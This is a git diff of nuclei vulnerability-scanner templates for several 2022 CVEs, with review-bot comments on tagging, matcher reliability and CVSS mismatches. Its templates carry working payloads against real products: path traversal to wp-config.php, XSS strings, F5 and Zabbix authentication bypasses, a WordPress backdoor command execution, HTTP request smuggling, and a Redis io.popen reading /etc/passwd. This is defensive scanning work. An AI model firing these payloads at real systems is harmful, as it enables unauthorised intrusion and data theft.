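Review bot: The `network` input in cve-2022-0543.yaml runs a shell command on the target (`io.popen` with `cat /etc/passwd`), but the `tags` line does not mark the template as intrusive, so scan profiles that filter on tags cannot exclude it. I would add `intrusive` to `tags: cve,cve2022,network,redis,unauth,rce,kev`. The `classification` block has no `cwe-id`; the same gap is in cve-2022-1392.yaml later in this commit. `read-size: 64` also means the `root:.*:0:0:` regex only matches when that entry falls within the first 64 bytes returned, which deserves a one-line comment next to it.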
@@ -1,42 +0,0 @@ -id: CVE-2022-0653 - -info: - name: Wordpress Profile Builder Plugin Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: | - The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 - - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ - - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail= - remediation: Upgrade to version 3.6.5 or later. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0653 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'here' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-0776.yaml b/nuclei-templates/CVE-2022/cve-2022-0776.yaml deleted file mode 100644 index 39746c0077..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0776.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2022-0776 - -info: - name: RevealJS postMessage <4.3.0 - Cross-Site Scripting - author: LogicalHunter - severity: high - description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model. - reference: - - https://hackerone.com/reports/691977 - - https://github.com/hakimel/reveal.js/pull/3137 - - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0776 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - cve-id: CVE-2022-0776 - tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs - -headless: - - steps: - - args: - url: "{{BaseURL}}" - action: navigate - - action: waitload - - action: script - name: extract - args: - code: | - () => { - return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0") - } - - matchers: - - type: word - part: extract - words: - - "true" - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-0870.yaml b/nuclei-templates/CVE-2022/cve-2022-0870.yaml new file mode 100644 index 0000000000..e97ed1ef8a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0870.yaml 
@@ -0,0 +1,54 @@ +id: CVE-2022-0870 + +info: + name: Gogs - SSRF + author: Akincibor + severity: medium + description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5. + reference: + - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 + - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb + - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-0870 + cwe-id: CWE-918 + metadata: + shodan-query: http.favicon.hash:-449283196 + tags: cve,cve2022,ssrf,gogs,huntr + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + name: version + internal: true + group: 1 + regex: + - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + - type: regex + group: 1 + regex: + - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + matchers-condition: and + matchers: + + - type: regex + part: body + regex: + - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + - type: dsl + dsl: + - compare_versions(version, '< 0.12.5') + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0921.yaml b/nuclei-templates/CVE-2022/cve-2022-0921.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-0921.yaml rename to nuclei-templates/CVE-2022/cve-2022-0921.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-1040.yaml b/nuclei-templates/CVE-2022/cve-2022-1040.yaml deleted file mode 100644 index c21e4a0d94..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1040.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-1040 - -info: - name: Sophos Firewall <=18.5 MR3 - Remote Code Execution - author: For3stCo1d - severity: critical - description: | - Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code. - reference: - - https://github.com/killvxk/CVE-2022-1040 - - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker - - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 - - https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-1040 - cwe-id: CWE-287 - metadata: - shodan-query: http.title:"Sophos" - verified: "true" - tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev - -requests: - - method: POST - path: - - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" - - headers: - X-Requested-With: "XMLHttpRequest" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{\"status\":\"Session Expired\"}" - - - type: word - part: header - words: - - "Server: xxxx" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/19 
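Review bot: The three `regex` entries in cve-2022-0870.yaml (the internal `version` extractor, the second extractor and the body matcher) repeat the same footer pattern, and the finding rests only on `compare_versions(version, '< 0.12.5')`. That makes this a version-banner check rather than a test of the SSRF itself: an instance with the footer hidden is missed, and a build carrying a backported fix is flagged. I would state that in `description`, for example `Detection is based on the Gogs version shown in the page footer.` The body-regex matcher appears redundant, since the dsl matcher already depends on the extracted `version`, and could be dropped.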
diff --git a/nuclei-templates/CVE-2022/cve-2022-1119.yaml b/nuclei-templates/CVE-2022/cve-2022-1119.yaml deleted file mode 100644 index 2e0ecf66e8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1119.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-1119 - -info: - name: WordPress Simple File List <3.2.8 - Local File Inclusion - author: random-robbie - severity: high - description: | - WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. - reference: - - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e - - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 - - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1119 - cwe-id: CWE-22 - tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-1221.yaml b/nuclei-templates/CVE-2022/cve-2022-1221.yaml new file mode 100644 index 0000000000..6c2b34470f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1221.yaml 
@@ -0,0 +1,45 @@ +id: CVE-2022-1221 + +info: + name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting + author: veshraj + severity: medium + description: | + Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. + reference: + - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1221 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1221 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - " popup-" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by md on 2022/09/12 diff --git a/nuclei-templates/CVE-2022/cve-2022-1388.yaml b/nuclei-templates/CVE-2022/cve-2022-1388.yaml deleted file mode 100644 index 1ae0147265..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1388.yaml +++ /dev/null 
@@ -1,27 +0,0 @@ -id: CVE-2022-1388-F5-RCE - -info: - name: CVE-2022-1388-F5-RCE - author: psc4re - severity: critical - tags: F5,BigIP,RCE,cve2022-1388 - reference: - - https://twitter.com/jas502n/status/1523611433938059265?s=20&t=Gj2puPeyO-xikJ3ONS4Lew - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 - -requests: - - raw: - - | - POST /mgmt/tm/util/bash HTTP/1.1 - Connection: keep-alive, X-F5-Auth-Token - X-F5-Auth-Token: anything - Authorization: Basic YWRtaW46 - Host: {{Hostname}} - - {"command":"run", "utilCmdArgs":"-c"} - - - matchers: - - type: dsl - dsl: - - contains(body, "tm:util:bash:runstate") && contains(body, "commandResult") && status_code==200 diff --git a/nuclei-templates/CVE-2022/cve-2022-1392.yaml b/nuclei-templates/CVE-2022/cve-2022-1392.yaml new file mode 100644 index 0000000000..b75a81b595 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1392.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2022-1392 + +info: + name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion + author: Veshraj + severity: high + description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + reference: + - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://packetstormsecurity.com/files/166534/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1392 + metadata: + verified: true + tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "failed to open stream: No such file or directory" + - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-1609.yaml b/nuclei-templates/CVE-2022/cve-2022-1609.yaml deleted file mode 100644 index 83188b53b1..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1609.yaml +++ /dev/null 
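Review bot: Both body words in cve-2022-1392.yaml are PHP warning text (`failed to open stream: No such file or directory` and the `REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php` path), so the template only fires where the site prints PHP errors into the page. A vulnerable install with error display turned off comes back clean. That limit belongs in `description`, for example `Detection relies on the PHP include warning being shown in the response.`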
@@ -1,39 +0,0 @@ -id: CVE-2022-1609 - -info: - name: The School Management < 9.9.7 - Remote Code Execution - author: For3stCo1d - severity: critical - description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. - reference: - - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609 - metadata: - verified: false - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: CVE-2022-1609 - cwe-id: CWE-77 - tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress - -variables: - cmd: "echo CVE-2022-1609 | rev" - -requests: - - raw: - - | - POST /wp-json/am-member/license HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - blowfish=1&blowf=system('{{cmd}}'); - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '9061-2202-EVC' - -# Enhanced by mp on 2022/05/27 diff --git a/nuclei-templates/CVE-2022/cve-2022-1904.yaml b/nuclei-templates/CVE-2022/cve-2022-1904.yaml new file mode 100644 index 0000000000..37cac91201 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1904.yaml 
@@ -0,0 +1,42 @@ +id: CVE-2022-1904 + +info: + name: WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. + reference: + - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b + - https://nvd.nist.gov/vuln/detail/CVE-2022-1904 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1904 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ' - Color' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-1906.yaml b/nuclei-templates/CVE-2022/cve-2022-1906.yaml new file mode 100644 index 0000000000..0cf1efbc16 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1906.yaml 
@@ -0,0 +1,45 @@ +id: CVE-2022-1906 + +info: + name: WordPress Copyright Proof <=4.16 - Cross-Site-Scripting + author: random-robbie + severity: medium + description: | + WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. + reference: + - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1906 + cwe-id: CWE-79 + metadata: + google-query: inurl:/wp-content/plugins/digiproveblog + verified: "true" + tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022 + +requests: + - raw: + - | + GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "got message " + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-21500.yaml b/nuclei-templates/CVE-2022/cve-2022-21500.yaml deleted file mode 100644 index 2a4dc2ff2e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-21500.yaml +++ /dev/null 
@@ -1,51 +0,0 @@ -id: CVE-2022-21500 - -info: - name: Oracle E-Business Suite <=12.2 - Authentication Bypass - author: 0xpugazh - severity: high - description: | - Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. - remediation: | - Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. - reference: - - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac - - https://twitter.com/GodfatherOrwa/status/1514720677173026816 - - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 - - https://www.oracle.com/security-alerts/cpujul2022.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-21500 - epss-score: 0.29303 - epss-percentile: 0.96354 - cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: oracle - product: e-business_suite - shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 - tags: cve,cve2022,oracle,misconfig,auth-bypass - -http: - - method: GET - path: - - '{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp' - - '{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp' - - '{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - 'Registration' - - 'Register as individual' - - '' - condition: and - - - type: status - status: - - 200 
diff --git a/nuclei-templates/CVE-2022/cve-2022-2187.yaml b/nuclei-templates/CVE-2022/cve-2022-2187.yaml
new file mode 100644
index 0000000000..76ce320f26
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-2187.yaml
@@ -0,0 +1,43 @@
+id: CVE-2022-2187
+
+info:
+ name: WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting
+ author: For3stCo1d
+ severity: medium
+ description: |
+ WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute.
+ reference:
+ - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d
+ - https://wordpress.org/plugins/contact-form-7-simple-recaptcha
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-2187
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-2187
+ cwe-id: CWE-79
+ tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,wp
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&">'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Contact Form 7"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/09/14
diff --git a/nuclei-templates/CVE-2022/cve-2022-22536.yaml b/nuclei-templates/CVE-2022/cve-2022-22536.yaml
new file mode 100644
index 0000000000..7b9308b289
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-22536.yaml
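Review bot: The probe in `path:` goes straight to `/wp-admin/options-general.php?page=cf7sr_edit` with no login request in front of it, and the tags carry no `authenticated` marker. WordPress settings pages under `/wp-admin/` normally redirect an anonymous client to the login form, so the `status: 200` matcher would presumably never fire on an unauthenticated scan and a vulnerable site would be reported clean. Either add a login step driven by `{{username}}`/`{{password}}` with `cookie-reuse: true`, as the CVE-2022-28080 template in this commit does, or at least document the precondition with a comment such as `# requires an authenticated admin session; unauthenticated runs cannot match`.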
@@ -0,0 +1,61 @@
+id: CVE-2022-22536
+
+info:
+ name: SAP Memory Pipes (MPI) Desynchronization
+ author: pdteam
+ severity: critical
+ description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-22536
+ - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
+ - https://github.com/Onapsis/onapsis_icmad_scanner
+ - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2022-22536
+ cwe-id: CWE-444
+ tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes
+
+requests:
+ - raw:
+ - |+
+ GET {{sap_path}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 82646
+ Connection: keep-alive
+
+ {{repeat("A", 82642)}}
+
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ payloads:
+ sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner
+ - /sap/admin/public/default.html
+ - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png
+
+ unsafe: true
+ read-all: true
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: dsl
+ dsl:
+ - "contains(tolower(body), 'administration')" # confirms 1st path
+ - "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path
+ condition: or
+
+ - type: word
+ part: body
+ words:
+ - "HTTP/1.0 400
Bad Request" # error in concatenated response
+ - "HTTP/1.0 500 Internal Server Error"
+ - "HTTP/1.0 500 Dispatching Error"
+ condition: or
+
+# Enhanced by mp on 2022/03/08
diff --git a/nuclei-templates/CVE-2022/cve-2022-22972.yaml b/nuclei-templates/CVE-2022/cve-2022-22972.yaml
new file mode 100644
index 0000000000..dc44fa1296
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-22972.yaml
@@ -0,0 +1,106 @@
+id: CVE-2022-22972
+
+info:
+ name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass
+ author: For3stCo1d,princechaddha
+ severity: critical
+ description: |
+ VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
+ reference:
+ - https://github.com/horizon3ai/CVE-2022-22972
+ - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
+ - https://www.vmware.com/security/advisories/VMSA-2022-0014.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-22972
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-22972
+ cwe-id: CWE-287
+ metadata:
+ fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize"
+ tags: cve,cve2022,vmware,auth-bypass,oast
+
+requests:
+ - raw:
+ - |
+ GET /vcac/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1
+ Host: {{interactsh-url}}
+ Content-type: application/x-www-form-urlencoded
+
+ protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in
+
+ host-redirects: true
+ max-redirects: 3
+ cookie-reuse: true
+ extractors:
+ - type: regex
+ part: body
+ name: protected_state
+ group: 1
+ regex:
+ - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>'
+ internal: true
+
+ - type: regex
+ part: body
+ name: horizonRelayState
+ group: 1
+ regex:
+ - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>'
+ internal: true
+
+ -
type: regex
+ part: body
+ name: userstore
+ group: 1
+ regex:
+ - 'id="userstore" value="([a-z.]+)" \/>'
+ internal: true
+
+ - type: regex
+ part: body
+ name: userstoreDisplay
+ group: 1
+ regex:
+ - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>'
+ internal: true
+
+ - type: regex
+ part: body
+ name: stickyConnectorId
+ group: 1
+ regex:
+ - 'name="stickyConnectorId" value="(.*)"/>'
+ internal: true
+
+ - type: kval
+ part: header
+ name: HZN-Cookie
+ kval:
+ - 'HZN'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "HZN="
+
+ - type: status
+ status:
+ - 302
+
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+# Enhanced by mp on 2022/06/01
diff --git a/nuclei-templates/CVE-2022/cve-2022-23131.yaml b/nuclei-templates/CVE-2022/cve-2022-23131.yaml
new file mode 100644
index 0000000000..0f93ea7161
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-23131.yaml
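Review bot: The last extractor (`type: kval`, `name: HZN-Cookie`, `kval: - 'HZN'`) is the only one without `internal: true`, so on a match the value of the `HZN` cookie is written to the scan output. Because the matchers require `HZN=` in the response to the sign-in POST, that value is presumably a live administrative session token, and it would end up in reports, CI logs and ticket attachments. The finding is already proven by the matchers, so drop the extractor or add `internal: true` to it.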
@@ -0,0 +1,39 @@
+id: CVE-2022-23131
+
+info:
+ name: Zabbix - SAML SSO Authentication Bypass
+ author: For3stCo1d
+ severity: critical
+ description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
+ reference:
+ - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
+ - https://github.com/1mxml/CVE-2022-23131
+ metadata:
+ shodan-query: http.favicon.hash:892542951
+ fofa-query: app="ZABBIX-监控系统" && body="saml"
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 9.8
+ cve-id: CVE-2022-23131
+ tags: cve,cve2022,zabbix,auth-bypass,saml,sso
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/zabbix/index_sso.php"
+ - "{{BaseURL}}/index_sso.php"
+
+ headers:
+ Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+
+ - type: dsl
+ dsl:
+ - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
diff --git a/nuclei-templates/CVE-2022/cve-2022-23134.yaml b/nuclei-templates/CVE-2022/cve-2022-23134.yaml
new file mode 100644
index 0000000000..8a1b34df97
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-23134.yaml
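Review bot: `cvss-metrics` and `cvss-score` disagree in the `classification` block: the vector ends in `A:N` but the score is `9.8`. The identical vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N` is scored `9.1` in cve-2022-26960.yaml added by this same commit. Check the NVD entry listed under `reference` and correct whichever of the two fields is wrong, since tooling that filters on either one will rank this finding differently. The block also has no `cwe-id`, unlike most templates added here.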
@@ -0,0 +1,43 @@
+id: CVE-2022-23134
+
+info:
+ name: Zabbix Setup Configuration Authentication Bypass
+ author: bananabr
+ severity: medium
+ description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
+ reference:
+ - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
